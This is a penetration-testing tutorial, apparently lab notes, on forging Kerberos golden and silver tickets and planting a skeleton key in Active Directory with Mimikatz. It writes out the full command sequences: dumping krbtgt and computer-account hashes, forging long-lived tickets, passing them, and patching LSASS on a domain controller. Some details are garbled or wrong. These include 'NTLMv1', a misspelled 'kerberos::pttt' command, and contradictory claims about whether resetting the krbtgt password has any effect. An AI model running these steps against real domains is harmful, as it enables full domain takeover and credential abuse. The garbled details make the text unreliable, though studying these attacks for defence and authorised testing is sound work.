ON THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES 1. GOLDEN TICKET , 2. SILVER TICKET AND 3. SKELETON KEY
GOLDEN TICKET:
A golden ticket is a special token that is created by penetration testers using the Security Identifier (SID) of the domain, the domain name, and the NTLMv1 hash of the Kerberos TGT. The golden ticket allows a penetration tester to gain access to any device within the domain by performing PTT(Pass The Ticket).
This is possible because the golden ticket is encrypted using the hash of the Kerberos TGT account, which is the built-in krbtgt account on Active Directory. However, the golden ticket is not digitally signed by the krbtgt account hash but is encrypted only. This golden ticket allows anyone to impersonate any user with the privileges associated with the impersonated user on systems within the domain. To make this type of attack even more awesome, imagine that changing the password for the krbtgt account has zero effect on mitigating this attack on Active Directory.
PRACTICAL DEMO:
- Fire up
windows server 2022and login as eitherDomain admin/SQLService - Make sure
mimikatzis installed beforehand. - Open
powershellwith admin privileges, and launchmimikatz.
- Use
Mimikatzto extract thedomain SIDandthe Kerberos TGT account NTLM hash (krbtgt)using the following command:
lsadump::lsa /inject /name:krbtgt

- Next, use
Mimikatzto create agolden ticketby providing thedomain SID and krbtgt NTLMv1 hashusing the following command:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /ticket:golden_ticket
The username specified in the preceding command does not necessarily need to be a valid user on the domain. Furthermore, using the ID of 500 allows us to specify the administrator user account on the domain. The /ticket command enables us to specify the name of the ticket when it’s created.
The golden ticket is stored offline within the Mimikatz directory. This golden ticket will allow a penetration test to access any system on the domain using the current session.
- Creating a
super golden ticketfor maximum validity period:
kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /endin:2147483647 /ticket:super_golden_ticket
/endin command enables us to specify the maximum validity of the ticket in minutes.
pass the ticketwith mimikatz:
kerberos::pttt golden_ticket

- To open a Command Prompt with the golden ticket session, use the following Mimikatz command:
misc::cmd

- On the cmd try these 2 command:
As shown in the preceding screenshot, when the whoamicommand is executed, the output shows thesqladminaccount is currently logged on to the system but theklistcommand reveals this Command Prompt session is using theNotAdminuser with the golden ticket. Therefore, you can access any device on the network using the golden ticket on this Command Prompt session.
As previously mentioned in this chapter, changing the krbtgt account password does not invalidate the tickets created by the krbtgt account; however, checking the password twice will invalidate the tickets.
Learn more about mimikatz
Silver ticket:
- Open the
domain controllerand login as eitherservice account/DOMAIN ADMIN - Then load
mimikatzon powershell(Open as admin). - Next, retrieve the
SID of the domainandthe NTLM hashesof a service account with a registered SPN or computer account:
lsadump::lsa /patch
HASH OF THE DC{HYDRA-DC}

You can also use the lsadump::lsa /inject /name:sqlservice command to retrieve the NTLM hash of a specific account with Mimikatz.
4. Next, let’s use Mimikatz to create a silver ticket with a fake username, the domain name, the domain SID, the NTLM (RC4) hash of the Domain Controller (DC1), and the target as the domain controller. The service to impersonate will be the HOST:
kerberos::golden /user:SilverTicket /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /rc4:d74d80c4ca134b7558c663b13566a112 /id:1234 /target:HYDRA-DC.MARVEL.local /service:HOST /ticket:silver_ticket
5. Now use the following command to perform PTT as well as get a cmd session:


SKELETON KEY:
- Use the following commands to enable the
Mimikatz driverson the disk of the domain controller and create the skeleton key:
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
2. Then open a command prompt using that skeleton key

When using the skeleton key, you can access any device on the domain using a valid username and the password as Mimikatz. However, keep in mind any host you’re attempting to access with the skeleton key needs to authenticate to the domain controller on the network. If the domain controller reboots, the skeleton key is lost. However, the skeleton key being lost if the domain controller reboots is an important operational detail. Since Mimikatz manipulates authentication processes that are resident in memory, they are not persistent through reboots unless specific measures are taken to ensure persistence.
- On the new
Cmduse the commandpowershellto spawn a powershell session.
- Access the domain controller using the following command:
Enter-PSSession -ComputerName HYDRA-DC -credential MARVEL\Administrator
- Provide the password of the domain admin:

- Use the following commands to verify:

Further reading:
• Understanding Kerberos – https://www.techtarget.com/searchsecurity/definition/ Kerberos • OS Credential Dumping: NTDS – https://attack.mitre.org/techniques/T1003/003/ • OS Credential Dumping: LSA Secrets – https://attack.mitre.org/techniques/T1003/004/ • LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/ T1557/001/ • Active Directory Security – https://adsecurity.org/